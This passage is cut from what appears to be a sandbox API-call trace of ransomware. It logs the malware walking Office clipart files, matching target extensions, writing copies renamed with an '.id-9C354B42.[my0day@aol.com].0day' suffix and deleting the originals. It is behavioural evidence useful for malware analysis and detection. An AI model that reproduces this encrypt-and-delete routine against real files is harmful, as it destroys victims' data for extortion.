Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63 [0269.745] lstrlenW (lpString=".doc") returned 4 [0269.745] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.745] lstrlenW (lpString=".docx") returned 5 [0269.745] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.745] lstrlenW (lpString=".pdf") returned 4 [0269.745] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.745] lstrlenW (lpString=".xls") returned 4 [0269.745] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.745] lstrlenW (lpString=".xlsx") returned 5 [0269.745] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.745] lstrlenW (lpString=".ppt") returned 4 [0269.745] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.745] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63 [0269.745] lstrlenW (lpString=".zip") returned 4 [0269.745] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.745] lstrlenW (lpString=".rar") returned 4 [0269.745] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.745] lstrlenW (lpString=".bz2") returned 4 [0269.745] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.745] lstrlenW (lpString=".7z") returned 3 [0269.746] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63 [0269.746] lstrlenW (lpString=".dbf") returned 4 [0269.746] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63 [0269.746] lstrlenW (lpString=".1cd") returned 4 [0269.746] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63 [0269.746] lstrlenW (lpString=".jpg") returned 4 [0269.746] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63 [0269.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63 [0269.746] lstrlenW (lpString=".doc") returned 4 [0269.746] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.746] lstrlenW (lpString=".docx") returned 5 [0269.746] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.746] lstrlenW (lpString=".pdf") returned 4 [0269.746] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.746] lstrlenW (lpString=".xls") returned 4 [0269.746] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.746] lstrlenW (lpString=".xlsx") returned 5 [0269.746] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.746] lstrlenW (lpString=".ppt") returned 4 [0269.746] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63 [0269.746] lstrlenW (lpString=".zip") returned 4 [0269.746] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.747] lstrlenW (lpString=".rar") returned 4 [0269.747] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.747] lstrlenW (lpString=".bz2") returned 4 [0269.747] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.747] lstrlenW (lpString=".7z") returned 3 [0269.747] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63 [0269.747] lstrlenW (lpString=".dbf") returned 4 [0269.747] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63 [0269.747] lstrlenW (lpString=".1cd") returned 4 [0269.747] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63 [0269.747] lstrlenW (lpString=".jpg") returned 4 [0269.747] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.747] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0269.747] lstrlenW (lpString="BL00524_.WMF") returned 12 [0269.747] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00524_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.748] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=6996) returned 1 [0269.748] CloseHandle (hObject=0x384) returned 1 [0269.748] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00524_.wmf")) returned 0x20 [0269.748] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00524_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0269.748] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00524_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.748] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.748] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.748] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00524_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0269.752] GetLastError () returned 0x0 [0269.752] ReadFile (in: hFile=0x384, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x1b54, lpOverlapped=0x0) returned 1 [0269.754] WriteFile (in: hFile=0x390, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x1b60, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0x1b60, lpOverlapped=0x0) returned 1 [0269.755] ReadFile (in: hFile=0x384, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.755] WriteFile (in: hFile=0x390, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.755] SetEndOfFile (hFile=0x390) returned 1 [0269.755] CloseHandle (hObject=0x390) returned 1 [0269.755] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.755] SetEndOfFile (hFile=0x384) returned 1 [0269.758] CloseHandle (hObject=0x384) returned 1 [0269.758] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0269.758] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00524_.wmf")) returned 1 [0269.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63 [0269.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63 [0269.759] lstrlenW (lpString=".doc") returned 4 [0269.759] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.759] lstrlenW (lpString=".docx") returned 5 [0269.759] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.759] lstrlenW (lpString=".pdf") returned 4 [0269.759] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.759] lstrlenW (lpString=".xls") returned 4 [0269.759] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.759] lstrlenW (lpString=".xlsx") returned 5 [0269.759] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.759] lstrlenW (lpString=".ppt") returned 4 [0269.759] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63 [0269.759] lstrlenW (lpString=".zip") returned 4 [0269.759] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.759] lstrlenW (lpString=".rar") returned 4 [0269.759] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.759] lstrlenW (lpString=".bz2") returned 4 [0269.759] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.759] lstrlenW (lpString=".7z") returned 3 [0269.759] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63 [0269.759] lstrlenW (lpString=".dbf") returned 4 [0269.759] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63 [0269.759] lstrlenW (lpString=".1cd") returned 4 [0269.759] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63 [0269.759] lstrlenW (lpString=".jpg") returned 4 [0269.759] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63 [0269.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63 [0269.759] lstrlenW (lpString=".doc") returned 4 [0269.760] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.760] lstrlenW (lpString=".docx") returned 5 [0269.760] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.760] lstrlenW (lpString=".pdf") returned 4 [0269.760] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.760] lstrlenW (lpString=".xls") returned 4 [0269.760] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.760] lstrlenW (lpString=".xlsx") returned 5 [0269.760] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.760] lstrlenW (lpString=".ppt") returned 4 [0269.760] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63 [0269.760] lstrlenW (lpString=".zip") returned 4 [0269.760] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.760] lstrlenW (lpString=".rar") returned 4 [0269.760] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.760] lstrlenW (lpString=".bz2") returned 4 [0269.760] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.760] lstrlenW (lpString=".7z") returned 3 [0269.760] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63 [0269.760] lstrlenW (lpString=".dbf") returned 4 [0269.760] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63 [0269.760] lstrlenW (lpString=".1cd") returned 4 [0269.760] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63 [0269.760] lstrlenW (lpString=".jpg") returned 4 [0269.760] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.760] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0269.761] lstrlenW (lpString="BL00525_.WMF") returned 12 [0269.761] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00525_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.761] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=9590) returned 1 [0269.761] CloseHandle (hObject=0x384) returned 1 [0269.761] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00525_.wmf")) returned 0x20 [0269.761] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00525_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0269.761] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00525_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.761] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.761] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.761] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00525_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0270.590] GetLastError () returned 0x0 [0270.590] ReadFile (in: hFile=0x384, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x2576, lpOverlapped=0x0) returned 1 [0270.591] WriteFile (in: hFile=0x38c, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x2580, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0x2580, lpOverlapped=0x0) returned 1 [0270.593] ReadFile (in: hFile=0x384, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.593] WriteFile (in: hFile=0x38c, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.593] SetEndOfFile (hFile=0x38c) returned 1 [0270.593] CloseHandle (hObject=0x38c) returned 1 [0270.593] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.593] SetEndOfFile (hFile=0x384) returned 1 [0270.598] CloseHandle (hObject=0x384) returned 1 [0270.598] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.605] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00525_.wmf")) returned 1 [0270.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63 [0270.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63 [0270.605] lstrlenW (lpString=".doc") returned 4 [0270.605] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.606] lstrlenW (lpString=".docx") returned 5 [0270.606] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.606] lstrlenW (lpString=".pdf") returned 4 [0270.606] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.606] lstrlenW (lpString=".xls") returned 4 [0270.606] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.606] lstrlenW (lpString=".xlsx") returned 5 [0270.606] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.606] lstrlenW (lpString=".ppt") returned 4 [0270.606] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63 [0270.606] lstrlenW (lpString=".zip") returned 4 [0270.606] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.606] lstrlenW (lpString=".rar") returned 4 [0270.606] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.606] lstrlenW (lpString=".bz2") returned 4 [0270.606] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.606] lstrlenW (lpString=".7z") returned 3 [0270.606] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63 [0270.606] lstrlenW (lpString=".dbf") returned 4 [0270.606] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63 [0270.606] lstrlenW (lpString=".1cd") returned 4 [0270.606] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63 [0270.606] lstrlenW (lpString=".jpg") returned 4 [0270.606] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63 [0270.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63 [0270.606] lstrlenW (lpString=".doc") returned 4 [0270.606] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.606] lstrlenW (lpString=".docx") returned 5 [0270.607] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.607] lstrlenW (lpString=".pdf") returned 4 [0270.607] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.607] lstrlenW (lpString=".xls") returned 4 [0270.607] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.607] lstrlenW (lpString=".xlsx") returned 5 [0270.607] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.607] lstrlenW (lpString=".ppt") returned 4 [0270.607] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63 [0270.607] lstrlenW (lpString=".zip") returned 4 [0270.607] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.607] lstrlenW (lpString=".rar") returned 4 [0270.607] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.607] lstrlenW (lpString=".bz2") returned 4 [0270.607] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.607] lstrlenW (lpString=".7z") returned 3 [0270.607] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63 [0270.607] lstrlenW (lpString=".dbf") returned 4 [0270.607] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63 [0270.607] lstrlenW (lpString=".1cd") returned 4 [0270.607] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63 [0270.607] lstrlenW (lpString=".jpg") returned 4 [0270.607] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.607] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0270.607] lstrlenW (lpString="BS00076_.WMF") returned 12 [0270.608] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00076_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0270.608] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=1330) returned 1 [0270.608] CloseHandle (hObject=0x38c) returned 1 [0270.608] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00076_.wmf")) returned 0x20 [0270.609] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00076_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00076_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0270.609] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.609] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00076_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0270.609] GetLastError () returned 0x0 [0270.609] ReadFile (in: hFile=0x38c, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x532, lpOverlapped=0x0) returned 1 [0270.611] WriteFile (in: hFile=0x2c4, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0x540, lpOverlapped=0x0) returned 1 [0270.616] ReadFile (in: hFile=0x38c, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.616] WriteFile (in: hFile=0x2c4, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.616] SetEndOfFile (hFile=0x2c4) returned 1 [0270.616] CloseHandle (hObject=0x2c4) returned 1 [0270.616] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.616] SetEndOfFile (hFile=0x38c) returned 1 [0270.618] CloseHandle (hObject=0x38c) returned 1 [0270.618] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.619] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00076_.wmf")) returned 1 [0270.619] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63 [0270.619] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63 [0270.619] lstrlenW (lpString=".doc") returned 4 [0270.619] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.619] lstrlenW (lpString=".docx") returned 5 [0270.619] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.619] lstrlenW (lpString=".pdf") returned 4 [0270.619] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.619] lstrlenW (lpString=".xls") returned 4 [0270.619] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.619] lstrlenW (lpString=".xlsx") returned 5 [0270.619] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.619] lstrlenW (lpString=".ppt") returned 4 [0270.619] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.619] lstrlenW 